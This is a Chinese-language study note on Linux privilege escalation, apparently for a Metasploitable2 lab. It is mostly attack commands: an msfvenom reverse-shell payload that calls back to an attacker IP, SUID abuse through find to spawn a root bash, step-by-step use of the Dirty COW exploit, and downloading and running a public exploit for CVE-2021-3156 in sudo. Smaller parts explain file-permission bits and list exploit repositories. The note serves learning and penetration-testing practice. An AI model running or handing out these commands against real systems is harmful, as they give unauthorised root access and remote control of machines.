linux提权

linux提权

提权

metasplitable2:msfadmin/msfadmin

searchsploit: 查找漏洞

1
2
linux木马生成:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.135 lport=4444 -f elf -o shell.elf

suid提权

suid:默认会以特权用户的权限去执行

s:特权用户

加入有suid文件可以进入交互模式,那么就可以用提权或者做后门.

less | more | tail

apt | apt-get….

提权步骤:

find / -perm -u=s -type f 2>/dev/null –> 查找具有suid权限的文件

以find命令为例:

find /etc/passwd -exec /bin/bash -p ; –> 利用文件进入root权限的bash

https://gtfobins.github.io/
1

文件权限:
-:代表文件
l:代表链接(软链接–>快捷方式;硬链接–>复制了一份源文件)
d:代表目录
r 4:可读(read)
w 2:可写(write)
x 1:可执行(execution)

d rwx r-x r-x
d:目录
rwx:当前用户的权限
r-x:当前用户组的权限
r-x:其他用户组的权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

#### 内核提权漏洞

脏牛漏洞:

exp: https://github.com/FireFart/dirtycow/blob/master/dirty.c

1.上传脏牛到靶机

2.对脏牛漏洞进行编译:

gcc -pthread dirty.c -o dirty -lcrypt

3.使用漏洞

chmod u+x dirty

./dirty 123123 <-- 自定义的密码, 默认用户是firefart

4.换源/etc/passwd

mv /tmp/passwd.bak /etc/passwd

#### 利用sudo提权

漏洞探测:
用户可以使用非root的账户登录系统,运行“ sudoedit -s / ”命令,
若返回如图以“ sudoedit:”开头的错误,则当前系统可能存在安全风险。
不受影响的系统将显示以“ usage:”开头的错误响应。

影响范围:
Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1

poc地址: https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz

利用:
wget https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
tar -zxvf CVE-2021-3156_nss_poc_ubuntu.tar.gz
cd CVE-2021-3156
chmod u+x *
make
./sudo-hax-me-a-sandwich 0


linux漏洞库: 

https://github.com/qazbnm456/awesome-cve-poc

https://github.com/SecWiki/linux-kernel-exploits



shellcode: 机器码(二进制,十六进制)